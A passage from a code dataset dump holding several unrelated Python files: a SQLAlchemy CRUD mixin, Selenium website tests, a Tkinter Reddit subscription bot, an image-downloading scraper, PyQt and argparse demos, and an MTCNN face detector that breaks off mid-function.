getInt(prompt)","sub_path":"codebase/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"559646338","text":"from webapp import db\n\nclass CRUDMixin(object):\n __table_args__ = {'extend_existing': True}\n\n id = db.Column(db.Integer, primary_key=True)\n\n # keep a list of properties that have changed, so we know if\n # something needs to be synced to the OpenStack cluster or to\n # the pool when save is called\n _changed_properties = set()\n\n @classmethod\n def get(cls):\n return db.session.query(cls).first()\n \n @classmethod \n def get_all(cls):\n return cls.query.all()\n \n @classmethod\n def get_by_id(cls, id):\n if any(\n (isinstance(id, basestring) and id.isdigit(),\n isinstance(id, (int, float))),\n ):\n return cls.query.get(int(id))\n return None\n\n @classmethod\n def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()\n\n def __setattr__(self, key, value):\n # only if value is different from what's currently set\n if getattr(self, key, None) != value:\n # remember properties that are being changed\n self._changed_properties.add(key)\n super(CRUDMixin, self).__setattr__(key, value)\n\n # hooks that should be called when properties are being updated,\n # by default there are none, this is supposed to be overriden\n def _get_sync_hooks(self):\n return {}\n\n # check for properties that have hooks to sync on change and call hooks\n def call_property_hooks(self):\n hooks = self._get_sync_hooks()\n properties = self._changed_properties.copy()\n for prop in properties:\n if prop in hooks.keys():\n # call sync hook for changed property\n hooks[prop]()\n\n def update(self, commit=True, **kwargs):\n for attr, value in kwargs.iteritems():\n setattr(self, attr, value)\n return commit and self.save() or self\n\n def save(self, commit=True, ignore_hooks=False):\n db.session.add(self)\n if commit:\n if not ignore_hooks:\n self.call_property_hooks()\n # reset the _changed_properties if syncing has been completed\n self._changed_properties = set()\n db.session.commit()\n return self\n\n def delete(self, commit=True):\n db.session.delete(self)\n return commit and db.session.commit()\n","sub_path":"webapp/models/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"104269224","text":"#_*_ coding:utf-8 _*_\n__author__ = 'Lee'\nimport sys\nimport os\ncurrentUrl = os.path.dirname(__file__)\nparentUrl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nsys.path.append(parentUrl)\nfrom selenium import webdriver\nimport unittest,time\nfrom Common.Common import CommonMethod\nfrom Common.Logger import Log\nclass Company(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n options = webdriver.ChromeOptions()\n options.binary_location = \"C:\\\\Users\\\\amallayev\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\"\n chrome_driver_binary = \"C:\\\\Python27\\\\chromedriver.exe\"\n cls.driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n def setUp(self):\n self.imgs = []\n self.comme = CommonMethod()\n self.log = Log()\n\n def add_img(self):\n #截图添加到测试报告中的方法\n self.imgs.append(self.driver.get_screenshot_as_base64())\n return True\n\n def setup_get(self):\n self.driver.get(self.comme.url)\n self.driver.maximize_window()\n self.driver.find_element_by_class_name('apsClose').click()\n\n def wall_step(self,page,counts):\n \"\"\"\n :param page:验证第几页的logo墙\n :param counts:当前页有几个logo\n :return:logo墙测试方法,无返回值\n \"\"\"\n self.comme.roll('//div[@class=\"company-prefecture-two-content\"]/div[5]',self.driver)\n\n time.sleep(0.8)\n for i in range(1,counts+1):\n self.comme.hover('//div[@class=\"company-prefecture-three-div\"]/div/div[1]',self.driver)\n time.sleep(0.1)\n\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div-number\"]/div[%d]/div'%page).click()\n time.sleep(2)\n self.comme.hover('//div[@class=\"company-prefecture-three-div\"]/div/div[%d]'%i,self.driver)\n try:\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div\"]/div/div[%d]'%i).click()\n except Exception as e:\n self.log.error(e)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div-number\"]/div[%d]/div'%page).click()\n time.sleep(1.8)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-three-div\"]/div/div[%d]'%i).click()\n time.sleep(1)\n self.add_img()\n self.driver.back()\n\n def test_company_1_ex(self):\n u\"\"\"金山云\"\"\"\n self.setup_get()\n time.sleep(1)\n self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-content-title-div\"]/div[2]/button').click()\n self.add_img()\n time.sleep(0.5)\n text1 = self.driver.find_element_by_xpath('//div[@class=\"company-read-info-content-content-title\"]/div/div').text\n self.assertIn(u'金山',text1)\n self.driver.back()\n\n def test_company_1_com(self):\n u\"\"\"金山云服务器,弹性IP,WPS+云办公\"\"\"\n self.setup_get()\n checklist=(u'服务器',u'弹性',u'云办公')\n for i in range(1,4):\n self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-content-title-div-middle\"]/div[%d]'%i).click()\n time.sleep(0.5)\n self.add_img()\n text2 = self.driver.find_element_by_xpath('//div[@class=\"product-item-title\"]/span').text\n self.assertIn(checklist[i-1],text2)\n\n self.driver.back()\n\n def test_company_2(self):\n u\"\"\"微软,今目标,阿里云,腾讯云,华为云,绿盟,并行,云势\"\"\"\n self.setup_get()\n checklist=(u'微软',u'今目标',u'阿里云',u'腾讯云',u'华为云',u'绿盟',u'并行',u'云势')\n self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n for i in range(1,9):\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-two-content\"]/div[%d]'%i).click()\n time.sleep(0.8)\n self.add_img()\n text1 = self.driver.find_element_by_xpath('//div[@class=\"company-read-info-content-content-title\"]/div/div').text\n self.assertIn(checklist[i-1],text1)\n self.driver.back()\n\n\n def test_logowall(self):\n u'''logo墙'''\n self.setup_get()\n\n self.wall_step(1,15)\n\n self.wall_step(2,15)\n\n self.wall_step(3,7)\n\n\n def test_company_contact_us(self):\n u'''公司联系我们'''\n self.setup_get()\n time.sleep(1)\n self.comme.roll('//div[@class=\"company-prefecture-title\"]',self.driver)\n self.driver.find_element_by_xpath('//div[@class=\"company-prefecture-content-title-div\"]/div[2]/button').click()\n #点击联系我们\n time.sleep(1)\n self.driver.find_element_by_xpath('//div[@class=\"company-read-info-content\"]/div[1]/div[3]/button').click()\n #填入信息并提交\n self.comme.contact_us(u'厂商联系测试',u'厂商',u'15656567878',u'测试测试',self.driver,u'test@123.com')\n time.sleep(1)\nif __name__ == '__main__':\n unittest.main()","sub_path":"CloudHomePage/testCase/Company.py","file_name":"Company.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"331378425","text":"import os\nimport sys\nimport subprocess\nimport praw\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import simpledialog\nimport tkinter.scrolledtext as tkst\nimport tkinter as tk\n\n#come back to add input for praw.ini file\nreddit = praw.Reddit('bot1')\nglobal commentids\nif not os.path.isfile('commentids.txt'):\n commentids = []\n open('commentids.txt', 'w+')\n \nwith open('commentids.txt', 'r')as f:\n commentids = f.read()\n commentids = commentids.split('\\n')\n commentids = list(filter(None, commentids))\n\nif not os.path.isfile(\"subscribers.txt\"):\n subscribers = []\n open(\"subscribers.txt\", \"w+\")\n\nwith open(\"subscribers.txt\", \"r\") as f:\n subscribers = f.read()\n subscribers = subscribers.split('\\n')\n subscribers = list(filter(None, subscribers))\n printed_subs = str(subscribers)\n subscriber_number1 = len(subscribers)\n subscriber_number2 = str(subscriber_number1)\n \nclass chirper():\n \n def __init__(self, root):\n global sub\n if not os.path.isfile('sub.txt'): \n f = open('sub.txt', 'w+') \n root.withdraw()\n sub = simpledialog.askstring(title='Subreddit Assignment',\n prompt='Set a subreddit to scan:')\n if sub == None:\n root.deiconify() \n elif sub != None:\n f.write(sub)\n print('New sub',\"'\", sub, \"'\", 'assigned successfully')\n global v\n v = StringVar()\n v.set('Scanning subreddit: ' + sub)\n root.deiconify()\n else:\n with open('sub.txt', 'r') as f:\n sub = f.read()\n v = StringVar()\n v.set('Scanning subreddit: ' + sub)\n \n #tkinter master\n frame = Frame(root)\n frame.pack()\n root.title(\"Reddit Chirper\")\n self.exit = Button(frame, text='Exit', fg='red', command=root.destroy)\n self.exit.grid(row=1, column=2)\n \n self.scan = Button(frame, text='Scan for new subscriptions and unsubscriptions', fg='black', command=self.scan)\n self.scan.grid(row=0, column=1)\n \n Label(root, textvariable=v).pack()\n \n self.assign_sub = Button(frame, text='Assign a new subreddit', fg='black', command=self.assign_sub)\n self.assign_sub.grid(row=0, column=2)\n \n self.send_message = Button(frame, text='Compose a message to your subscribers', fg='black', command=self.send_message)\n self.send_message.grid(row=1, column=1)\n \n textArea = tkst.ScrolledText()\n textArea.pack()\n textArea.insert(tk.INSERT,\n subscriber_number2 + ' subscribers: ' + printed_subs)\n \n #scans for new subscribers in assigned subreddit\n def scan(self):\n subreddit = reddit.subreddit(sub)\n for comment in reddit.subreddit(sub).comments():\n if comment.author.name not in subscribers and comment.id not in commentids and re.search(\"chirperadd!\", comment.body, re.IGNORECASE):\n comment.reply('You have been subscribed.')\n print(comment.author.name + ' subscribed.')\n subscribers.append(comment.author.name)\n with open (\"subscribers.txt\", \"w\") as f:\n for comment.author in subscribers:\n f.write(comment.author.name + \"\\n\")\n commentids.append(comment.id) \n with open ('commentids.txt', 'w')as f:\n for comment.id in commentids:\n f.write(comment.id + '\\n')\n \n elif comment.author.name in subscribers and comment.id not in commentids and re.search(\"chirperremove!\", comment.body, re.IGNORECASE):\n comment.reply(\"You have been unsubscribed.\")\n print(comment.author.name + ' unsubscribed.') \n commentids.append(comment.id)\n with open ('commentids.txt', 'w')as f:\n for comment.id in commentids:\n f.write(comment.id + '\\n')\n subscribers.remove(comment.author.name) #removes the comment author from the subscribers list to update tkinter 'show subscribers' output\n with open (\"subscribers.txt\", \"r+\") as f:\n lines = f.readlines()\n f.seek(0)\n for line in lines:\n if line == comment.author.name:\n f.write(\"\") \n \n def assign_sub(self):\n f = open('sub.txt', 'w+')\n root.withdraw()\n sub = simpledialog.askstring(title='Subreddit Assignment',\n prompt='Set a subreddit to scan:')\n if sub == None:\n root.deiconify() \n elif sub != None:\n f.write(sub)\n print('New sub',\"'\", sub, \"'\", 'assigned successfully')\n v = StringVar()\n v.set('Scanning subreddit: ' + sub)\n root.update_idletasks()\n root.deiconify()\n \n global Hermes \n def Hermes(self):\n print('placeholder function')\n \n def send_message(self):\n messenger = tk.Toplevel()\n messenger.title('Compose message')\n \n message_input = Text(messenger, bg='lightgrey')\n message_input.pack()\n \n self.send = Button(messenger, text='Send message', fg='black', command=lambda: [messenger.destroy(), Hermes(self)])\n self.send.pack()\n \nif __name__ == '__main__':\n root=tk.Tk()\n chirper(root)\n root.mainloop()\n","sub_path":"chirper.py","file_name":"chirper.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"156098101","text":"#coding:utf-8\nimport urllib.request\nimport urllib.parse\nfrom bs4 import BeautifulSoup\nimport re\nimport os\n\ndef url_open(url):\n headers = {\"Referer\": \"http://www.netbian.com/s/lol/\",\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\"}\n req = urllib.request.Request(url,headers=headers)\n response = urllib.request.urlopen(req)\n html = response.read()\n\n return html\n\ndef find_imgs(url):\n html = url_open(url).decode(\"ANSI\")\n imgs_addrs = []\n regular = re.compile(r\"http://img\\.netbian\\.com/file/newc/[a-z0-9]+\\.jpg\")\n for each in regular.findall(html):\n imgs_addrs.append(each)\n print(\">>>imgs_addrs:\",imgs_addrs)\n\n return imgs_addrs\n\n\ndef save_imgs(folder,img_addrs):\n for each in img_addrs:\n filename = each.split(\"/\")[-1]\n with open(filename, 'wb') as f:\n img = url_open(each)\n f.write(img)\n\ndef download_Bizhi(folder=\"LOL壁纸\", pages=7):\n os.mkdir(folder)\n os.chdir(folder)\n\n url = \"http://www.netbian.com/s/lol/\"\n\n for i in range(1,pages):\n if i == 1:\n page_url = url + \"index.htm\"\n else:\n page_url = url + \"index_\" + str(i) + \".htm\"\n img_addrs = find_imgs(page_url)\n save_imgs(folder,img_addrs)\n\nif __name__ == \"__main__\":\n download_Bizhi()","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"155843773","text":"\"\"\"\nsetAlignment(): 设置文本对齐\n\nsetIndent(): 设置文本缩进\n\ntext(): 获取文本内容\n\nsetBuddy(): 设置伙伴关系\n\nsetText(); 设置文本内容\n\nselectedText(): 返回所选择的字符\n\nsetWordWrap(): 设置是否运行换行\n\nlinkHovered :鼠标滑过\nlinkActivated: 鼠标点击\n\"\"\"\n\nimport sys\nfrom PyQt5 import QtWidgets, QtCore\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QToolTip, QWidget, QVBoxLayout, QLabel\nfrom PyQt5.QtGui import QIcon, QFont, QPalette, QPixmap\n\nclass QlableDemo(QWidget):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n label1 = QLabel(self)\n label2 = QLabel(self)\n label3 = QLabel(self)\n label4 = QLabel(self)\n label1.setText(\"这是一个文本编辑框\")\n label1.setAutoFillBackground(True)\n palette = QPalette()\n palette.setColor(QPalette.Window, Qt.blue)\n\n label1.setPalette(palette)\n label1.setAlignment(Qt.AlignCenter)\n label2.setText(\"欢迎使用Python GUI程序\")\n label3.setAlignment(Qt.AlignCenter)\n label3.setToolTip('图片标签')\n label3.setPixmap(QPixmap('F:\\Aphrodite\\picture\\disi第四印象 604期\\yoyo8.jpg'))\n label4.setOpenExternalLinks(False)\n label4.setText(\"漂不漂亮啊?\")\n label4.setAlignment(Qt.AlignRight)\n label4.setToolTip('超级连接')\n\n layout = QVBoxLayout()\n layout.addWidget(label1)\n layout.addWidget(label2)\n layout.addWidget(label3)\n layout.addWidget(label4)\n\n label2.linkHovered.connect(self.linkHovered)\n label4.linkActivated.connect(self.linkClicked)\n\n self.setLayout(layout)\n self.setWindowTitle('QLabel演示')\n self.setWindowIcon(QIcon('E:\\music\\down.ico'))\n def linkHovered(self):\n print('当鼠标滑过label2')\n\n def linkClicked(self):\n print('鼠标单击label4')\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = QlableDemo()\n main.show()\n sys.exit(app.exec_())","sub_path":"PyQtclass/class/lable_class.py","file_name":"lable_class.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"586726703","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'MFC'\n__time__ = '2020-05-05 11:26'\n\n\"\"\"\nref:\nhttps://docs.python.org/zh-cn/3/library/argparse.html\nhttps://docs.python.org/zh-cn/3/howto/argparse.html\n\n\nrun in terminal:\n\npython argparse_demo.py -h \npython argparse_demo.py --help\npython argparse_demo.py foo \n\n在没有任何选项的情况下运行脚本不会在标准输出显示任何内容。这没有什么用处。\n\n第二行代码开始展现出 argparse 模块的作用。我们几乎什么也没有做,但已经得到一条很好的帮助信息。\n\n--help 选项,也可缩写为 -h,是唯一一个可以直接使用的选项(即不需要指定该选项的内容)。指定任何内容都会导致错误。即便如此,我们也能直接得到一条有用的用法信息。\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser()\n\n# 位置参数\n# parser.add_argument(\"echo\")\n\n# 增加位置参数的说明\nparser.add_argument(\"echo\", help=\"echo the args you use here\")\nparser.add_argument(\"square\", help=\"display a square of a given number\",type=int) # 指定类型\n\n# 可选参数\nparser.add_argument(\"--verbosity\", help=\"increase output verbosity\",action=\"store_true\")\n# 指定了一个新的关键词 action,并赋值为 \"store_true\"。这意味着,当这一选项存在时,为 args.verbose 赋值为 True。没有指定时则隐含地赋值为 False。\n# 如果一个可选参数没有被使用时,相关变量被赋值为 None\n\nargs = parser.parse_args()\n\nif args.verbosity:\n print('verbosity turned on')\n\nprint(args.echo)\nprint(args.square**2)\n# 运行 python argparse_demo.py foo 能打印出foo\n\n\n# python argparse_demo.py test 3\n# python argparse_demo.py test 3 --verbosity x\n","sub_path":"python_official_doc/argparse_demo.py","file_name":"argparse_demo.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"37337492","text":"'''\n@Project: deep-learning-with-keras-notebooks\n@Package \n@author: ly\n@date Date: 2019年05月05日 14:13\n@Description: \n@URL: https://github.com/ShyBigBoy/face-detection-mtcnn/blob/master/detect_face.py\n https://zhuanlan.zhihu.com/p/58825924\n@version: V1.0\n'''\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom six import string_types, iteritems\n\nimport numpy as np\nimport tensorflow as tf\n\nimport cv2\nimport os\n\ndef layer( op ):\n #Decorator for composable network layers.\n\n def layer_decorated( self, *args, **kwargs ):\n # Automatically set a name if not provided.\n name = kwargs.setdefault( 'name', self.get_unique_name( op.__name__ ) )\n # Figure out the layer inputs.\n if len( self.terminals ) == 0:\n raise RuntimeError( 'No input variables found for layer %' % name )\n elif len( self.terminals) == 1:\n layer_input = self.terminals[0]\n else:\n layer_input = list( self.terminals )\n\n # Perform the operation and get the output.\n layer_output = op( self, layer_input, *args, **kwargs )\n #Add to layer LUT\n self.layers[name] = layer_output\n #This outputs is now the input for the next layer\n self.feed( layer_output )\n return self\n\n return layer_decorated\n\nclass Network( object ):\n\n def __init__(self, inputs, trainable=True ):\n # The input nodes for this network\n self.inputs = inputs\n # The current list of terminal nodes\n self.terminals = []\n # Mapping from layer names to layers\n self.layers = dict( inputs )\n # If true, the resulting variables are set as trainable\n self.trainable = trainable\n\n self.setup()\n\n def setup(self ):\n \"\"\"Construct the network. \"\"\"\n raise NotImplementedError( 'Must be implemented by the subclass' )\n\n def load(self, data_path, session, ignore_missing=False ):\n '''\n DESC: Load network weights.\n :param data_path: The path to the numpy-serialized network weights\n :param session: The current TensorFlow session\n :param ignore_missing: If true, serialized weights for missing layers are ignored.\n :return:\n '''\n data_dict = np.load( data_path, encoding='latin1' ).item()\n\n for op_name in data_dict:\n with tf.variable_scope( op_name, reuse=True ):\n for param_name, data in iteritems( data_dict[ op_name] ):\n try:\n var = tf.get_variable( param_name )\n session.run( var.assign( data ) )\n except ValueError:\n if not ignore_missing:\n raise\n\n def feed(self, *args ):\n '''\n DESC: Set the input(s) for the next operation by replacing the terminal nodes.\n The arguments can be either layer names or the actual layers.\n :param args:\n :return:\n '''\n assert len( args ) != 0\n self.terminals = []\n for fed_layer in args:\n if isinstance( fed_layer, string_types ):\n try:\n fed_layer = self.layers[ fed_layer ]\n except KeyError:\n raise KeyError( 'Unknown layer name fed %s' % fed_layer )\n\n self.terminals.append( fed_layer )\n\n return self\n\n def get_output(self):\n '''\n DESC: Returns the current network output.\n :return:\n '''\n return self.terminals[ -1 ]\n\n def get_unique_name(self, prefix ):\n '''\n DESC: Returns an index-suffixed unique name for the given prefix.\n This is used for auto-generating layer names based on the type-prefix.\n :param prefix:\n :return:\n '''\n ident = sum( t.startswith( prefix ) for t, _ in self.layers.items() ) + 1\n return '%s_%d' % ( prefix, ident )\n\n def make_var(self, name, shape ):\n '''\n Creates a new TensorFlow variable\n :param name:\n :param shape:\n :return:\n '''\n return tf.get_variable( name, shape, trainable=self.trainable )\n\n def validate_padding(self, padding ):\n '''\n Verifies that the padding is one of the supported ones\n :param padding:\n :return:\n '''\n assert padding in ( 'SAME', 'VALID' )\n\n\n @layer\n def conv(self,\n inp,\n k_h,\n k_w,\n c_o,\n s_h,\n s_w,\n name,\n relu=True,\n padding='SAME',\n group=1,\n biased=True ):\n '''\n\n :param inp:\n :param k_h:\n :param k_w:\n :param c_o:\n :param s_h:\n :param s_w:\n :param name:\n :param relu:\n :param padding:\n :param group:\n :param biased:\n :return:\n '''\n #Verify that the padding( padding )\n self.validate_padding( padding )\n # Get the number of channels in the input\n c_i = int( inp.get_shape()[-1] )\n #Verify that the grouping parameter is valid\n assert c_i % group == 0\n assert c_o % group == 0\n #Convolution for a given input and kernel\n convolve = lambda i, k: tf.nn.conv2d( i, k, [1, s_h, s_w, 1], padding=padding )\n with tf.variable_scope( name ) as scope:\n kernel = self.make_var( 'weights', shape=[ k_h, k_w, c_i//group, c_o ] )\n #This is the common-case. Convolve the input without any further complications.\n output = convolve( inp, kernel )\n #Add the biases\n if biased:\n biases = self.make_var( 'biases', [ c_o ] )\n output = tf.nn.bias_add( output, biases )\n if relu:\n # ReLU non-linearity\n output = tf.nn.relu( output, name=scope.name )\n\n return output\n\n @layer\n def prelu(self, inp, name ):\n '''\n\n :param inp:\n :param name:\n :return:\n '''\n with tf.variable_scope( name ):\n i = int( inp.get_shape()[-1] )\n alpha = self.make_var( 'alpha', shape=(i, ) )\n output = tf.nn.relu( inp ) + tf.multiply( alpha, -tf.nn.relu( -inp) )\n return output\n\n @layer\n def max_pool(self, inp, k_h, k_w, s_h, s_w, name, padding='SAME' ):\n '''\n MAX POOL\n :param inp:\n :param k_h:\n :param k_w:\n :param s_h:\n :param s_w:\n :param name:\n :param padding:\n :return:\n '''\n self.validate_padding( padding )\n return tf.nn.max_pool( inp,\n ksize=[ 1, k_h, k_w, 1 ],\n strides=[ 1, s_h, s_w, 1 ],\n padding=padding,\n name=name )\n\n @layer\n def fc(self, inp, num_out, name, relu=True ):\n '''\n FULL connect layer\n :param inp:\n :param num_out:\n :param name:\n :param relu:\n :return:\n '''\n with tf.variable_scope( name ):\n input_shape = inp.get_shape()\n if input_shape.ndims == 4:\n # The input is spatial. Vectorize it first.\n dim = 1\n for d in input_shape[ 1: ].as_list():\n dim *= int(d)\n feed_in = tf.reshape( inp, [ -1, dim ] )\n else:\n feed_in, dim = ( inp, input_shape[-1].value )\n weights = self.make_var( 'weights', shape=[ dim, num_out ] )\n biases = self.make_var( 'biases', [num_out] )\n op = tf.nn.relu_layer if relu else tf.nn.xw_plus_b\n fc = op( feed_in, weights, biases, name=name )\n\n return fc\n\n \"\"\"\n Multi dimensional softmax,\n refer to https://github.com/tensorflow/tensorflow/issues/210\n compute softmax along the dimension of target\n the native softmax only supports batch_size x dimension\n \"\"\"\n @layer\n def softmax(self, target, axis, name=None ):\n max_axis = tf.reduce_max( target, axis, keepdims=True )\n target_exp = tf.exp( target - max_axis )\n normalize = tf.reduce_sum( target_exp, axis=axis, keepdims=True )\n softmax = tf.div( target_exp, normalize, name )\n return softmax\n\n\nclass PNet( Network ):\n\n def setup(self):\n ( self.feed( 'data' ) #pylint: disable=no-value-for-parameter, no-member\n .conv( 3, 3, 10, 1, 1, padding='VALID', relu=False, name='conv1')\n .prelu( name='PReLU1' )\n .max_pool( 2, 2, 2, 2, name='pool1' )\n .conv( 3, 3, 16, 1, 1, padding='VALID', relu=False, name='conv2' )\n .prelu( name='PReLU2' )\n .conv( 3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv3' )\n .prelu( name='PReLU3' )\n .conv( 1, 1, 2, 1, 1, relu=False, name='conv4-1' )\n .softmax( 3, name='prob1' )\n )###二分类,即为人脸的概率\n ( self.feed( 'PReLU3') #pylint: disable=no-value-for-parameter\n .conv( 1, 1, 4, 1, 1, relu=False, name='conv4-2' )\n )#预测框(Boundingbox)偏移回归\n\nclass RNet( Network ):\n def setup(self ):\n ( self.feed( 'data')#pylint: disable=no-value-for-parameter, no-member\n .conv( 3, 3, 28, 1, 1, padding='VALID', relu=False, name='conv1' )\n .prelu( name='prelu1' )\n .max_pool( 3, 3, 2, 2, name='pool1' )\n .conv( 3, 3, 48, 1, 1, padding='VALID', relu=False, name='conv2' )\n .prelu( name='prelu2' )\n .max_pool( 3, 3, 2, 2, padding='VALID', name='pool2' )\n .conv( 2, 2, 64, 1, 1, padding='VALID', relu=False, name='conv3' )\n .prelu( name='prelu3' )\n .fc( 128, relu=False, name='conv4' )\n .prelu( name='prelu4' )\n .fc( 2, relu=False, name='conv5-1' )\n .softmax( 1, name='prob1')\n )\n ( self.feed( 'prelu4' )\n .fc( 4, relu=False, name='conv5-2' )\n )\n\nclass ONet( Network ):\n def setup(self ):\n ( self.feed( 'data') #pylint: disable=no-value-for-parameter, no-member\n .conv( 3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv1' )\n .prelu( name='prelu1' )\n .max_pool( 3, 3, 2, 2, name='pool1' )\n .conv( 3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv2' )\n .prelu( name='prelu2' )\n .max_pool( 3, 3, 2, 2, padding='VALID', name='pool2' )\n .conv( 3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv3' )\n .prelu( name='prelu3' )\n .max_pool( 2, 2, 2, 2, name='pool3' )\n .conv( 2, 2, 128, 1, 1, padding='VALID', relu=False, name='conv4' )\n .prelu( name='prelu4' )\n .fc( 256, relu=False, name='conv5' )\n .prelu( name='prelu5' )\n .fc( 2, relu=False, name='conv6-1' )\n .softmax( 1, name='prob1' )\n )\n ( self.feed( 'prelu5')\n .fc( 4, relu=False, name='conv6-2')\n )\n ( self.feed( 'prelu5' )\n .fc( 10, relu=False, name='conv6-3')\n )\n\ndef create_mtcnn( sess, model_path ):\n '''\n\n :param sess:\n :param model_path:\n :return:\n '''\n if not model_path:\n model_path, _ = os.path.split( os.path.realpath( __file__ ) )\n\n with tf.variable_scope( 'pnet' ):\n data = tf.placeholder( tf.float32, ( None, None, None, 3 ), 'input' )\n pnet = PNet( { 'data': data } )\n pnet.load( os.path.join( model_path, 'det1.npy'), sess )\n with tf.variable_scope( 'rnet' ):\n data = tf.placeholder( tf.float32, ( None, 24, 24, 3 ), 'input' )\n rnet = RNet( { 'data' : data } )\n rnet.load( os.path.join( model_path, 'det2.npy'), sess )\n with tf.variable_scope( 'onet' ):\n data = tf.placeholder( tf.float32, ( None, 48, 48, 3 ), 'input' )\n onet = ONet( { 'data' : data } )\n onet.load( os.path.join( model_path, 'det3.npy'), sess )\n\n pnet_fun = lambda img: sess.run( ('pnet/conv4-2/BiasAdd:0', 'pnet/prob1:0'), feed_dict={ 'pnet/input:0' : img } )\n rnet_fun = lambda img: sess.run( ('rnet/conv5-2/conv5-2:0', 'rnet/prob1:0'), feed_dict={ 'rnet/input:0': img } )\n onet_fun = lambda img: sess.run( ('onet/conv6-2/conv6-2:0', 'onet/conv6-3/conv6-3:0', 'onet/prob1:0' ), feed_dict={ 'onet/input:0': img } )\n\n return pnet_fun, rnet_fun, onet_fun\n\ndef detect_face( img, minsize, pnet, rnet, onet, threshold, factor ):\n '''\n DESC: Detects faces in an image, and returns bounding boxes and points for them.\n :param img: input image\n :param minsize: minimum faces' size\n :param pnet: model\n :param rnet: model\n :param onet: modelmodel\n :param threshold: threshold=[th1, th2, th3], th1-3 are three steps's threshold\n :param factor: the factor used to create a scaling pyramid of face sizes to detect in the image.\n :return:\n '''\n orgImgage = img.copy()\n factor_count = 0\n total_boxes = np.empty( ( 0, 9 ))\n points = np.empty( 0 )\n h = img.shape[0]\n w = img.shape[1]\n minl = np.amin( [ h, w ] )\n m = 12.0 / minsize\n minl = minl * m\n #\n scales = []\n while minl >= 12: #只要图像size>12像素,就进行缩放,scales记录每次缩放比例\n scales += [ m * np.power( factor, factor_count ) ]\n minl = minl * factor\n factor_count += 1\n\n # first stage\n for scale in scales:\n hs = int( np.ceil( h * scale ) )\n ws = int( np.ceil( w * scale ) )\n im_data = imresample( img, ( hs, ws ) ) #对图像按缩放比例缩放\n\n im_data = ( im_data - 127.5 ) * 0.0078125\n img_x = np.expand_dims( im_data, 0 )\n img_y = np.transpose( img_x, ( 0, 2 ,1, 3 ) )\n out = pnet( img_y ) ##输入pnet网络中,获得输出\n out0 = np.transpose( out[0], ( 0, 2, 1, 3 ) ) ###二分类,即为人脸的概率\n out1 = np.transpose( out[1], ( 0, 2, 1, 3 ) ) ###预测框偏移回归 out0 size(1,H/12,W/12,2)\n\n boxes, _ = generateBoundingBox( out1[ 0, :, :, 1 ].copy(), out0[0, :, :, :].copy(), scale, threshold[0] )\n\n #showTempImage( img[:, :, ::-1], boxes )\n # inter-scale nms\n pick = nms( boxes.copy(), 0.5, 'Union' )\n if boxes.size > 0 and pick.size > 0:\n boxes = boxes[ pick, : ]\n total_boxes = np.append( total_boxes, boxes, axis=0 )\n\n numbox = total_boxes.shape[0]\n if numbox > 0:\n pick = nms( total_boxes.copy(), 0.7, 'Union' )\n total_boxes = total_boxes[ pick, : ]\n regw = total_boxes[ :, 2 ] - total_boxes[ :, 0 ]\n regh = total_boxes[ :, 3 ] - total_boxes[ :, 1 ]\n qq1 = total_boxes[ :, 0 ] + total_boxes[ :, 5 ] * regw\n qq2 = total_boxes[ :, 1 ] + total_boxes[ :, 6 ] * regh\n qq3 = total_boxes[ :, 2 ] + total_boxes[ :, 7 ] * regw\n qq4 = total_boxes[ :, 3 ] + total_boxes[ :, 8 ] * regh\n total_boxes = np.transpose( np.vstack( [ qq1, qq2, qq3, qq4, total_boxes[:,4] ] ) ) #依次为修正后的左上角,右下角坐标及该部分得分\n total_boxes = rerec( total_boxes.copy() )\n total_boxes[ :, 0:4 ] = np.fix( total_boxes[ :, 0:4 ] ).astype( np.int32) ##取整\n dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph = pad( total_boxes.copy(), w, h )\n\n 